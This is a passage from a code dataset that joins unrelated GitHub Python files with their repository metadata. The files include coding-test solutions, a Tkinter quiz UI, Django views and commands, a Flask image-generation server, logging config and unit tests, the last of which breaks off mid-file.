continue\n # 괴물이 존재하는 경우\n if arr[nx][ny] == 0:\n continue\n # 제대로 된 길인 경우\n if arr[nx][ny] == 1:\n # 다음으로 이동할 곳에 현재 값의 + 1을 하여 움직인 칸 수 저장하기\n arr[nx][ny] = arr[x][y] + 1\n # 큐에 다음 좌표 할당\n queue.append((nx, ny))\n # 종점의 값 반환\n return arr[n-1][m-1]\n\n\n# 시작 좌표 할당\nprint(bfs(0, 0))\n","repo_name":"pipi-shortstocking/CodingTest","sub_path":"DFS,BFS/미로 탈출/복습.py","file_name":"복습.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9509839371","text":"from quiz_brain import QuizBrain\nfrom tkinter import *\n\nTHEME_COLOR = \"#375362\"\n\n\nclass QuizInterface:\n def __init__(self, quiz_brain: QuizBrain):\n self.quiz = quiz_brain\n self.window = Tk()\n self.window.title(\"Quizler\")\n self.window.config(padx=20, pady=20, bg=THEME_COLOR)\n\n self.score = Label(text=\"Score: 0\", bg=THEME_COLOR, font=(\"Arial\", 14), fg=\"white\")\n self.score.grid(row=0, column=1)\n\n self.canvas = Canvas(width=300, height=250, bg=\"white\")\n self.main_text = self.canvas.create_text(150, 125, text=\"\", font=(\"Arial\", 20, \"italic\"), width=280)\n self.canvas.grid(row=1, column=0, columnspan=2, padx=20, pady=20)\n self.update_text()\n\n correct_img = PhotoImage(file=\"./images/true.png\")\n false_img = PhotoImage(file=\"./images/false.png\")\n self.correct_bt = Button(image=correct_img, highlightthickness=0, command=self.correct_handler)\n self.correct_bt.grid(row=2, column=1)\n self.false_bt = Button(image=false_img, highlightthickness=0, command=self.false_handler)\n self.false_bt.grid(row=2, column=0)\n\n self.window.mainloop()\n\n def answer_handler(self, answer):\n color = \"green\" if self.quiz.check_answer(answer) else \"red\"\n self.window.after(250, self.update_screen, color)\n\n def correct_handler(self):\n self.answer_handler(\"True\")\n\n def false_handler(self):\n self.answer_handler(\"False\")\n\n def update_text(self):\n self.canvas.config(bg=\"white\")\n self.score.config(text=f\"Score:{self.quiz.score}\")\n if self.quiz.question_number < 10:\n self.canvas.itemconfig(self.main_text, text=self.quiz.next_question())\n else:\n self.canvas.itemconfig(self.main_text,\n text=f\"Final Score: {self.quiz.score}/{self.quiz.question_number}\")\n self.correct_bt.config(state=\"disabled\")\n self.false_bt.config(state=\"disabled\")\n\n def update_screen(self, color):\n self.canvas.config(bg=color)\n self.window.after(500, self.update_text)\n","repo_name":"Robprogram2002/one_hundred_code_challenge_course","sub_path":"days_16_40_intermediate/Day34/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6830133840","text":"import cv2\nimport numpy as np\ndef getHomography(kpsA, kpsB, featuresA, featuresB, matches, reprojThresh):\n # convert the keypoints to numpy arrays\n kpsA = np.float32([kp.pt for kp in kpsA])\n kpsB = np.float32([kp.pt for kp in kpsB])\n \n if len(matches) >= 4:\n # construct the two sets of points\n ptsA = np.float32([kpsA[m.queryIdx] for m in matches]).reshape(-1,1,2)\n ptsB = np.float32([kpsB[m.trainIdx] for m in matches]).reshape(-1,1,2)\n \n # estimate the homography between the sets of points\n (H, status) = cv2.findHomography(ptsA, ptsB, cv2.RANSAC, reprojThresh)\n return (matches, H, status)\n else:\n print(\"Can't not match !\")\n return 
None","repo_name":"NgTuanLoc/PanoramaStitching","sub_path":"getHomography.py","file_name":"getHomography.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11344790426","text":"import json\nimport sys\n\nfrom .command import Command\nfrom datetime import datetime\nfrom webkitcorepy import arguments\nfrom webkitscmpy import Commit, local\n\n\nclass Info(Command):\n name = 'info'\n help = 'Print information about the HEAD commit'\n\n @classmethod\n def parser(cls, parser, loggers=None):\n parser.add_argument(\n '--json', '-j',\n help='Convert the commit to a machine-readable JSON object',\n action='store_true',\n dest='json',\n default=False,\n )\n parser.add_argument(\n '--log', '--no-log',\n help='Include the commit message for the requested commit',\n action=arguments.NoAction,\n dest='include_log',\n default=True,\n )\n\n @classmethod\n def print_(cls, args, commits, verbose_default=0):\n if args.json:\n print(json.dumps(commits if len(commits) > 1 else commits[0], cls=Commit.Encoder, indent=4))\n return 0\n\n if args.verbose < verbose_default:\n for commit in commits:\n print('{identifier} | {hash}{revision}{title}'.format(\n identifier=commit,\n hash=commit.hash[:Commit.HASH_LABEL_SIZE] if commit.hash else '',\n revision='{}r{}'.format(', ' if commit.hash else '', commit.revision) if commit.revision else '',\n title=' | {}'.format(commit.message.splitlines()[0]) if commit.message else ''\n ))\n return 0\n\n previous = False\n for commit in commits:\n if previous:\n print('-' * 20)\n previous = True\n if commit.message:\n print(u'Title: {}'.format(commit.message.splitlines()[0]))\n try:\n print(u'Author: {}'.format(commit.author))\n except (UnicodeEncodeError, UnicodeDecodeError):\n print('Error: Unable to print commit author name, please file a bug if seeing this locally.')\n print(datetime.fromtimestamp(commit.timestamp).strftime('Date: %a %b %d %H:%M:%S %Y'))\n if args.verbose > verbose_default or commit.revision:\n print('Revision: {}'.format(commit.revision or 'N/A'))\n if args.verbose > verbose_default or commit.hash:\n print('Hash: {}'.format(commit.hash[:Commit.HASH_LABEL_SIZE] if commit.hash else 'N/A'))\n print(u'Identifier: {}'.format(commit))\n\n if args.verbose > verbose_default:\n for line in commit.message.splitlines():\n print(u' {}'.format(line))\n\n return 0\n\n @classmethod\n def main(cls, args, repository, reference='HEAD', **kwargs):\n if not repository:\n sys.stderr.write('No repository provided\\n')\n return 1\n\n scopes = getattr(args, 'scopes', None)\n\n try:\n if '..' in reference:\n if '...' in reference:\n sys.stderr.write(\"'find' sub-command only supports '..' 
notation\\n\")\n return 1\n references = reference.split('..')\n if len(references) > 2:\n sys.stderr.write('Can only include two references in a range\\n')\n return 1\n kwargs_to_pass = dict(\n begin=dict(argument=references[0]),\n end=dict(argument=references[1]),\n )\n if scopes:\n if not isinstance(repository, local.Git):\n sys.stderr.write(\"Can only use the '--scope' argument on a native Git repository\\n\")\n return 1\n kwargs_to_pass['scopes'] = scopes\n commits = [commit for commit in repository.commits(**kwargs_to_pass)]\n else:\n if scopes:\n sys.stderr.write('Scope argument invalid when only one commit specified\\n')\n return 1\n commits = [repository.find(reference, include_log=args.include_log)]\n\n except (local.Scm.Exception, TypeError, ValueError) as exception:\n # ValueErrors and Scm exceptions usually contain enough information to be displayed\n # to the user as an error\n sys.stderr.write(str(exception) + '\\n')\n return 1\n\n for commit in commits:\n if args.include_log and args.verbose > 0 and not commit.message:\n sys.stderr.write(\"Failed to find the commit message for '{}'\\n\".format(commit))\n return 1\n\n return cls.print_(args, commits)\n\n\nclass Find(Command):\n name = 'find'\n help = 'Given an identifier, revision or hash, normalize and print the commit'\n aliases = ['list']\n\n @classmethod\n def parser(cls, parser, loggers=None):\n Info.parser(parser, loggers=loggers)\n\n parser.add_argument(\n 'argument', nargs=1,\n type=str, default=None,\n help='String representation of a commit or branch to be normalized',\n )\n parser.add_argument(\n '--scope', '-s',\n help='Filter queries for commit ranges to specific paths in the repository',\n action='append',\n dest='scopes',\n default=None,\n )\n\n @classmethod\n def main(cls, args, repository, **kwargs):\n return Info.main(args, repository=repository, reference=args.argument[0], **kwargs)\n","repo_name":"WebKit/WebKit","sub_path":"Tools/Scripts/libraries/webkitscmpy/webkitscmpy/program/find.py","file_name":"find.py","file_ext":"py","file_size_in_byte":5486,"program_lang":"python","lang":"en","doc_type":"code","stars":6880,"dataset":"github-code","pt":"3"} +{"seq_id":"31073102639","text":"from django.conf import settings\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\n\nfrom rest_framework import status\nfrom rest_framework.exceptions import (\n AuthenticationFailed, ErrorDetail, NotAuthenticated, ValidationError)\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom rest_framework_simplejwt.exceptions import InvalidToken\nfrom rest_framework_simplejwt.tokens import RefreshToken\n\nfrom ..models import User\nfrom ..serializers.register import *\nfrom ..utils import Util\n\n\nclass RegisterView(GenericAPIView):\n \"\"\"\n View for taking in a new user's credentials and sending a confirmation email to verify.\n \"\"\"\n serializer_class = RegisterSerializer\n\n def post(self, request):\n \"\"\"\n POST method that performs validation, creates a user instance, and sends a verification email.\n \"\"\"\n verify = request.query_params.get(\n 'verify', settings.FRONT_END_VERIFY_PATHS['REGISTER'])\n serializer = self.serializer_class(data=request.data)\n try:\n serializer.is_valid(raise_exception=True)\n except ValidationError as exc:\n for key, errors in 
exc.detail.items():\n for error in errors:\n if error.code == f'{key}_exists':\n return Response(exc.detail, status.HTTP_409_CONFLICT)\n return Response(exc.detail, exc.status_code)\n\n user = serializer.save()\n\n Util.send_email_link(\n _('Verify your email address with Icon Syntax'),\n _(\n 'Thank you for registering an account with Icon Syntax! Please follow the link below to complete the registration process. If clicking it does not work, try copying the entire URL and pasting it into your address bar.'\n ),\n user,\n verify)\n\n return Response(\n {\n 'success':\n _(\n 'Step 1 of user registration successful. Check your email for a confirmation link to complete the process.'\n ),\n 'credentials':\n user.credentials\n }, status.HTTP_201_CREATED)\n\n\nclass RegisterVerifyView(GenericAPIView):\n \"\"\"\n View for accepting a generated token from a new user to complete the registration process.\n \"\"\"\n serializer_class = RegisterVerifySerializer\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n \"\"\"\n POST method for taking a token from a query string, checking if it is valid, and marking its associated user's email address as verified.\n \"\"\"\n serializer = self.serializer_class(\n data={}, context={'user': request.user})\n\n try:\n serializer.is_valid(raise_exception=True)\n except ValidationError as exc:\n return Response(exc.detail, exc.status_code)\n\n serializer.save()\n\n return Response(\n {\n 'success':\n _(\n 'You have successfully verified your email address and completed the registration process! You may now access the site\\'s full features.'\n ),\n **serializer.validated_data\n },\n status=status.HTTP_200_OK)\n","repo_name":"McCarthyCode/Icon-Syntax-Back-End","sub_path":"api/authentication/views/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71990753683","text":"import sys\n\nN = int(sys.stdin.readline())\n\narr = list(map(int, sys.stdin.readline().split()))\n\narr.sort()\n\nresult = 0\n\nfor i in range(N):\n target = arr[i]\n\n start = 0\n end = N - 1\n\n while start < end:\n tmp = arr[start] + arr[end]\n\n if tmp < target:\n start += 1\n elif tmp > target:\n end -= 1\n else:\n if start != i and end != i:\n result += 1\n break\n if start == i:\n start += 1\n elif end == i:\n end -= 1\n\nprint(result)\n\n","repo_name":"da-in/algorithm-study","sub_path":"Baekjoon - 문제풀이/좋다/yoonhyeong.py","file_name":"yoonhyeong.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"} +{"seq_id":"21998680760","text":"from PyQt5.QtGui import QImage\nimport os, io\nimport random\nimport threading\nimport argparse, os, sys, glob\nsys.path.append(\".\")\n\nfrom generation_manager import Generator\nfrom flask import Flask, request, send_file, make_response\nfrom flask_lt import run_with_lt\n\napp = Flask(__name__)\nrun_with_lt(app)\n\n@app.route(\"/img2img\", methods=['POST'])\ndef img2img():\n image_data = request.data\n image=QImage(image_data, int(request.args.get(\"w\")), int(request.args.get(\"h\")), QImage.Format_ARGB32)\n flags=request.args.to_dict()\n if 'seed' in flags.keys():\n if (int(flags['seed'])==0):\n flags['seed']=random.randint(0,100000)\n else:\n flags['seed'] = random.randint(0, 100000)\n generation_thread=threading.Thread(target=generator.img2img, args=(flags, image,))\n generation_thread.start()\n return 
\"OK\"\n\n@app.route(\"/inpaint\", methods=['POST'])\ndef img2imgInpainting():\n image_data = request.data\n image=QImage(image_data, int(request.args.get(\"w\")), int(request.args.get(\"h\")), QImage.Format_ARGB32)\n flags=request.args.to_dict()\n if 'seed' in flags.keys():\n if (int(flags['seed'])==0):\n flags['seed']=random.randint(0,100000)\n else:\n flags['seed'] = random.randint(0, 100000)\n generation_thread = threading.Thread(target=generator.img2imgInpainting, args=(flags, image,))\n generation_thread.start()\n return \"OK\"\n\n@app.route(\"/progress\")\ndef progress():\n args=request.args.to_dict()\n visual=False\n if 'visual' in args.keys():\n visual=args['visual']=='True'\n image, progress = generator.get_progress(visual)\n response=None\n if progress==0 or not visual:\n response=make_response()\n response.headers['X-Progress'] = progress\n if (visual or progress==100) and (progress > 0):\n img_byte_arr = io.BytesIO()\n image.save(img_byte_arr, format='PNG')\n img_byte_arr.seek(0)\n response=make_response(send_file(img_byte_arr,\"image/png\"))\n response.headers['X-Progress'] = progress\n return response\n\n@app.route(\"/txt2img\")\ndef txt2img():\n flags = request.args.to_dict()\n if 'seed' in flags.keys():\n if (int(flags['seed'])==0):\n flags['seed']=random.randint(0,100000)\n else:\n flags['seed'] = random.randint(0, 100000)\n generation_thread = threading.Thread(target=generator.generate, args=(flags,))\n generation_thread.start()\n return \"OK\"\n\ngenerator=Generator()\ngenerator.load_models()\n\napp.run(host=\"0.0.0.0\")\n","repo_name":"anansish/testshit","sub_path":"stable_server.py","file_name":"stable_server.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17910217102","text":"def locate_first(target, string):\n index = 0\n while index < len(string):\n if string[index : index + len(target)] == target:\n return index\n else:\n index += 1\n return -1\n\n\n# Here's a call you can test it with. 
This should print 4:\nprint(locate_first('ook', 'cookbook'))\nprint(locate_first('base', 'all your bass are belong to us'))\n","repo_name":"PitrsxD/Python-learning","sub_path":"while_locate_first.py","file_name":"while_locate_first.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72930488081","text":"import sqlite3\n\nimport pandas\nfrom django import db\nfrom django.core.management.base import BaseCommand\n\nimport_template = [\n (\"category\", \"reviews_category\", {}, [], []),\n (\n \"comments\",\n \"reviews_comments\",\n {\n \"review\": \"review_id\",\n \"author\": \"author_id\",\n },\n [],\n [],\n ),\n (\"genre_title\", \"reviews_title_genre\", {\"title\": \"titles_id\"}, [], []),\n (\"genre\", \"reviews_genre\", {}, [], []),\n (\n \"review\",\n \"reviews_review\",\n {\n \"title\": \"title_id\",\n \"author\": \"author_id\",\n },\n [],\n [],\n ),\n (\n \"titles\",\n \"reviews_title\",\n {\"category\": \"category_id\"},\n [\n (\"description\", \"change_me\"),\n ],\n [],\n ),\n (\n \"users\",\n \"user_user\",\n {},\n [\n (\"password\", \"change_me\"),\n (\"last_login\", \"2023-06-15 06:02:58.522746\"),\n (\"is_superuser\", False),\n (\"is_staff\", False),\n (\"is_active\", False),\n (\"date_joined\", \"2023-06-15 06:02:58.522746\"),\n (\"confirmation_code\", \"default\"),\n ],\n [],\n ),\n]\n\n\nclass Command(BaseCommand):\n help = \"Import data from local csv files into database.\"\n\n def handle(self, *args, **kwargs):\n db_path = db.utils.settings.DATABASES[\"default\"][\"NAME\"]\n\n conn = sqlite3.connect(db_path)\n c = conn.cursor()\n\n for entry in import_template:\n (file_name, table_name, columns_to_rename,\n columns_to_add, columns_date_modification_type) = entry\n\n c.execute(\n f\"DELETE FROM {table_name};\",\n )\n\n conn.commit()\n\n # давайте предположим, что файлы будут всегда лежать здесь\n df = pandas.read_csv(f\"static/data/{file_name}.csv\")\n\n df.rename(columns=columns_to_rename, inplace=True)\n\n if columns_to_add:\n for column in columns_to_add:\n name, default_value = column\n df.insert(0, name, default_value)\n\n if columns_date_modification_type:\n for column in columns_date_modification_type:\n name, format = column\n df[name] = pandas.to_datetime(df[name], format=format)\n\n df.to_sql(table_name, conn, if_exists=\"append\", index=False)\n\n conn.close()\n\n self.stdout.write(\"Import Complete!\")\n","repo_name":"vyacheslavtarasov/api_yamdb","sub_path":"api_yamdb/reviews/management/commands/dbdataimport.py","file_name":"dbdataimport.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"42409238771","text":"import sys\r\nimport argparse\r\nimport data_processing as dp\r\nimport models\r\nimport evaluation\r\nimport database as db\r\n\r\ndef parse_arguments():\r\n parser = argparse.ArgumentParser(description=\"Train and test ML models with user-provided CSV data.\")\r\n parser.add_argument(\"csv_file\", help=\"Path to the CSV file containing the data.\")\r\n parser.add_argument(\"models\", nargs=\"+\", help=\"List of ML models to use (e.g., RandomForest, LogisticRegression).\")\r\n args = parser.parse_args()\r\n return args.csv_file, args.models\r\n\r\ndef main():\r\n # Parse command-line arguments (CSV file path, ML models, etc.)\r\n csv_file_path, ml_models = parse_arguments()\r\n\r\n # Load and preprocess data\r\n train_data, test_data = 
dp.load_and_preprocess_data(csv_file_path)\r\n\r\n # Train and test models\r\n results = []\r\n for model_name in ml_models:\r\n model = models.train_model(train_data, model_name)\r\n test_result = models.test_model(test_data, model)\r\n result = evaluation.evaluate(test_result, model_name)\r\n results.append(result)\r\n\r\n # Save results to the MySQL database\r\n db.save_results_to_database(results)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"shoaibswe/ml_model_automation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8437532745","text":"import abc\nfrom typing import Dict, Type\n\nfrom . import codec\nfrom .track import Track, TrackInfo\n\n__all__ = [\"AudioSource\",\n \"audio_source\",\n \"get_source\",\n \"BandCamp\",\n \"Beam\",\n \"Nico\",\n \"SoundCloud\",\n \"Twitch\",\n \"Vimeo\",\n \"Youtube\"]\n\n\nclass AudioSource(abc.ABC):\n \"\"\"Audio source.\"\"\"\n\n def __str__(self) -> str:\n return self.get_name()\n\n @classmethod\n @abc.abstractmethod\n def get_name(cls) -> str:\n \"\"\"Get the name of the audio source.\"\"\"\n ...\n\n @abc.abstractmethod\n def encode(self, track: Track, writer: codec.Writer) -> None:\n \"\"\"Encode the extra details of the source.\"\"\"\n ...\n\n @classmethod\n @abc.abstractmethod\n def decode(cls, info: TrackInfo, reader: codec.Reader):\n \"\"\"Decode the extra details of the source.\"\"\"\n ...\n\n\ndef create_unknown_source(name: str) -> Type[AudioSource]:\n class UnknownSource(AudioSource):\n def __repr__(self) -> str:\n return f\"Unknown({name!r})\"\n\n @classmethod\n def get_name(cls) -> str:\n return name\n\n def encode(self, track: Track, writer: codec.Writer) -> None:\n pass\n\n @classmethod\n def decode(cls, info: TrackInfo, reader: codec.Reader):\n return cls()\n\n return UnknownSource\n\n\n_SOURCES: Dict[str, Type[AudioSource]] = {}\n\n\ndef audio_source(cls=None):\n \"\"\"Decorator to mark a source.\"\"\"\n\n def decorator(cls: Type[AudioSource]):\n _SOURCES[cls.get_name()] = cls\n return cls\n\n if cls is None:\n return decorator\n else:\n return decorator(cls)\n\n\ndef get_source(name: str) -> Type[AudioSource]:\n \"\"\"Get the audio source for the name.\n\n Returns:\n A subclass of `AudioSource` and an unknown source when\n no registered source type (audio sources decorated with `audio_source`)\n was found.\n \"\"\"\n try:\n return _SOURCES[name]\n except KeyError:\n return create_unknown_source(name)\n\n\nclass _BuiltinAudioSource(AudioSource):\n def __repr__(self) -> str:\n return f\"{type(self).__name__}()\"\n\n @classmethod\n def get_name(cls) -> str:\n try:\n name = cls.__source_name__\n except AttributeError:\n name = cls.__source_name__ = cls.__name__.lower()\n\n return name\n\n def __eq__(self, other) -> bool:\n if isinstance(other, _BuiltinAudioSource):\n return self.get_name() == other.get_name()\n else:\n return NotImplemented\n\n def encode(self, track: Track, writer: codec.Writer) -> None:\n pass\n\n @classmethod\n def decode(cls, info: TrackInfo, reader: codec.Reader) -> \"AudioSource\":\n return cls()\n\n\n@audio_source\nclass BandCamp(_BuiltinAudioSource):\n ...\n\n\n@audio_source\nclass Beam(_BuiltinAudioSource):\n __source_name__ = \"beam.pro\"\n\n\n@audio_source\nclass Nico(_BuiltinAudioSource):\n __source_name__ = \"niconico\"\n\n\n@audio_source\nclass SoundCloud(_BuiltinAudioSource):\n ...\n\n\n@audio_source\nclass Twitch(_BuiltinAudioSource):\n 
...\n\n\n@audio_source\nclass Vimeo(_BuiltinAudioSource):\n ...\n\n\n@audio_source\nclass Youtube(_BuiltinAudioSource):\n ...\n","repo_name":"gieseladev/lptrack","sub_path":"lptrack/sources.py","file_name":"sources.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36386226554","text":"from unittest.mock import MagicMock, patch\n\nimport pytest\nfrom vectory.db.models import DatasetModel, Query\n\n\n@patch(\"vectory.db.models.DatasetModel.select\", return_value=[])\ndef test_get_dataset_not_found(select_mock: MagicMock):\n \"\"\"Dataset doesn't exist\"\"\"\n\n with pytest.raises(DatasetModel.DoesNotExist):\n Query(DatasetModel).get()\n\n select_mock.assert_called_once_with()\n\n\n@patch(\"vectory.db.models.DatasetModel.select\", return_value=[\"test\", \"test2\"])\ndef test_get_datasets(select_mock: MagicMock):\n \"\"\"Dataset doesn't exist\"\"\"\n\n datasets = Query(DatasetModel).get()\n\n assert len(datasets) == 2\n select_mock.assert_called_once_with()\n\n\n@patch(\"vectory.db.models.os.path.abspath\", return_value=\"test_path_absolute.csv\")\ndef test_get_dataset_conditions(abspath_mock: MagicMock):\n \"\"\"Get datasets\"\"\"\n query_mock = MagicMock()\n query_mock.where = MagicMock(return_value=query_mock)\n\n with patch(\n \"vectory.db.models.DatasetModel.select\", return_value=query_mock\n ) as select_mock:\n with pytest.raises(DatasetModel.DoesNotExist):\n Query(DatasetModel).get(name=\"test\", csv_path=\"test_path_relative.csv\")\n\n select_mock.assert_called_once_with()\n abspath_mock.assert_called_once_with(\"test_path_relative.csv\")\n assert query_mock.where.call_count == 2\n\n expression_first_where = query_mock.where.call_args_list[0][0][0]\n assert expression_first_where.lhs.name == \"name\"\n assert expression_first_where.rhs == \"test\"\n\n expression_second_where = query_mock.where.call_args_list[1][0][0]\n assert expression_second_where.lhs.name == \"csv_path\"\n assert expression_second_where.rhs == \"test_path_absolute.csv\"\n","repo_name":"pentoai/vectory","sub_path":"test/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"3"} +{"seq_id":"17517541577","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFile : config_logging.py\r\nAuthor : GraphLinq Chain\r\nEmail : info@graphlinq.io\r\nWebsite : https://graphlinq.io\r\nRepository : https://github.com/jrbgit/GraphLinq.TelegramBot\r\nDate : 2023-06-20\r\nVersion : 1.1\r\nDescription : Logging Config - Telegram bot for GraphLinq\r\n\"\"\"\r\nimport logging\r\n\r\nloggers = {}\r\n\r\ntelegram_bot_logger = logging.getLogger('telegram')\r\nfile_handler = logging.FileHandler('logs/telegram_bot_debug.log')\r\nformatter = logging.Formatter('[%(levelname)s] [%(asctime)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\r\nfile_handler.setFormatter(formatter)\r\ntelegram_bot_logger.addHandler(file_handler)\r\n\r\n\r\nlog_formats = {\r\n logging.DEBUG: {\r\n 'filename': 'logs/debug.log',\r\n 'encoding': 'utf-8',\r\n 'format': '[DEBUG] [%(asctime)s] %(message)s',\r\n 'datefmt': '%Y-%m-%d %H:%M:%S'\r\n },\r\n logging.INFO: {\r\n 'filename': 'logs/info.log',\r\n 'encoding': 'utf-8',\r\n 'format': '[INFO] [%(asctime)s] %(message)s',\r\n 'datefmt': '%Y-%m-%d %H:%M:%S'\r\n },\r\n logging.WARNING: {\r\n 'filename': 'logs/warning.log',\r\n 'encoding': 'utf-8',\r\n 'format': '[WARNING] 
[%(asctime)s] %(message)s',\r\n 'datefmt': '%Y-%m-%d %H:%M:%S'\r\n },\r\n logging.ERROR: {\r\n 'filename': 'logs/error.log',\r\n 'encoding': 'utf-8',\r\n 'format': '[ERROR] [%(asctime)s] %(message)s',\r\n 'datefmt': '%Y-%m-%d %H:%M:%S'\r\n },\r\n logging.CRITICAL: {\r\n 'filename': 'logs/critical.log',\r\n 'encoding': 'utf-8',\r\n 'format': '[CRITICAL] [%(asctime)s] %(message)s',\r\n 'datefmt': '%Y-%m-%d %H:%M:%S'\r\n }\r\n}\r\n\r\nfor level, settings in log_formats.items():\r\n logger = logging.getLogger(str(level))\r\n logger.setLevel(level)\r\n\r\n file_handler = logging.FileHandler(filename=settings['filename'], encoding=settings['encoding'])\r\n formatter = logging.Formatter(settings['format'], datefmt=settings['datefmt'])\r\n file_handler.setFormatter(formatter)\r\n\r\n logger.addHandler(file_handler)\r\n loggers[level] = logger\r\n\r\ndef log_debug(message):\r\n loggers[logging.DEBUG].debug(message)\r\n\r\ndef log_info(message):\r\n loggers[logging.INFO].info(message)\r\n\r\ndef log_warning(message):\r\n loggers[logging.WARNING].warning(message)\r\n\r\ndef log_error(message):\r\n loggers[logging.ERROR].error(message)\r\n\r\ndef log_critical(message):\r\n loggers[logging.CRITICAL].critical(message)\r\n\r\n","repo_name":"jrbgit/GraphLinq.TelegramBot","sub_path":"config_logging.py","file_name":"config_logging.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"12687412466","text":"from random import choice, sample\nfrom numpy import array\n\nx = list(range(0,100000))\n\n\ndef lister():\n\tx = list(range(0,100000))\n\n\ty = sample(x, 10000) \n\ty.sort()\n\ty.reverse()\n\n\tfor pop in y:\n\t\tx.pop(pop)\n\n\ndef arrayer():\n\tx = list(range(0,100000))\n\n\ty=[]\n\tfor i in range(0, len(x)):\n\t\ty.append(choice([True, False]))\n\tx = array(x)\n\tx = x[y]\n\n#lister()\narrayer()\n","repo_name":"csoeder/Human-Denovo-Polymorphs","sub_path":"scripts/poptest.py","file_name":"poptest.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13355358302","text":"arquivo = open('/home/renato/Área de Trabalho/Projeto Xakriabá/indces escolas indigenas/ind.txt','r') #MATRICULA_SUDESTE\nresultado= open('/home/renato/Área de Trabalho/Projeto Xakriabá/indces escolas indigenas/indice_Turmas 2008.txt','w')\nresultado= open('/home/renato/Área de Trabalho/Projeto Xakriabá/indces escolas indigenas/indice_Turmas 2008.txt','a')\n\ncontador=0\ncontador2=0\nn=0\nfor linha in arquivo:\n linha=linha.rstrip()\n x = linha.split(\"|\")\n while n!=-1:\n\n\n contador=contador+1\n resultado.write(x[n]+'\\n')\n n=n+1\n\n\n\narquivo.close()\nresultado.close()\nprint('EXIT SUSSESS')\nprint('foram encontradas ',contador,' resultados')","repo_name":"Renatolopo/Banco-de-dados-inep","sub_path":"Scripts/indices.py","file_name":"indices.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12663229369","text":"import base64\n\nfrom django.contrib.sites.models import Site\nfrom django.core import mail\nfrom django.utils.six.moves import cPickle as pickle\nfrom django.test import TestCase\nfrom django.test.utils import override_settings\n\nfrom ..conf import settings\nfrom ..models import NoticeType, NoticeQueueBatch, NoticeSetting\nfrom ..models import LanguageStoreNotAvailable\nfrom ..models import get_notification_language, 
send_now, send, queue\nfrom ..compat import get_user_model\n\nfrom .models import Language\n\nfrom . import get_backend_id\n\n\nclass BaseTest(TestCase):\n def setUp(self):\n self.user = get_user_model().objects.create_user(\"test_user\", \"test@user.com\", \"123456\")\n self.user2 = get_user_model().objects.create_user(\"test_user2\", \"test2@user.com\", \"123456\")\n NoticeType.create(\"label\", \"display\", \"description\")\n self.notice_type = NoticeType.objects.get(label=\"label\")\n\n def tearDown(self):\n self.user.delete()\n self.user2.delete()\n self.notice_type.delete()\n\n\nclass TestNoticeType(TestCase):\n\n def test_create(self):\n label = \"friends_invite\"\n NoticeType.create(label, \"Invitation Received\", \"you received an invitation\", default=2,\n verbosity=2)\n n = NoticeType.objects.get(label=label)\n self.assertEqual(str(n), label)\n # update\n NoticeType.create(label, \"Invitation for you\", \"you got an invitation\", default=1,\n verbosity=2)\n n = NoticeType.objects.get(pk=n.pk)\n self.assertEqual(n.display, \"Invitation for you\")\n self.assertEqual(n.description, \"you got an invitation\")\n self.assertEqual(n.default, 1)\n\n\nclass TestNoticeSetting(BaseTest):\n def test_for_user(self):\n email_id = get_backend_id(\"email\")\n notice_setting = NoticeSetting.objects.create(\n user=self.user,\n notice_type=self.notice_type,\n medium=email_id,\n send=False\n )\n self.assertEqual(\n NoticeSetting.for_user(self.user, self.notice_type, email_id, scoping=None),\n notice_setting\n )\n\n # test default fallback\n NoticeSetting.for_user(self.user2, self.notice_type, email_id, scoping=None)\n ns2 = NoticeSetting.objects.get(user=self.user2, notice_type=self.notice_type, medium=email_id)\n self.assertTrue(ns2.send)\n\n\nclass TestProcedures(BaseTest):\n def setUp(self):\n super(TestProcedures, self).setUp()\n self.lang = Language.objects.create(user=self.user, language=\"en_US\")\n mail.outbox = []\n\n def tearDown(self):\n super(TestProcedures, self).tearDown()\n self.lang.delete()\n NoticeQueueBatch.objects.all().delete()\n\n @override_settings(PINAX_NOTIFICATIONS_LANGUAGE_MODEL=\"tests.Language\")\n def test_get_notification_language(self):\n 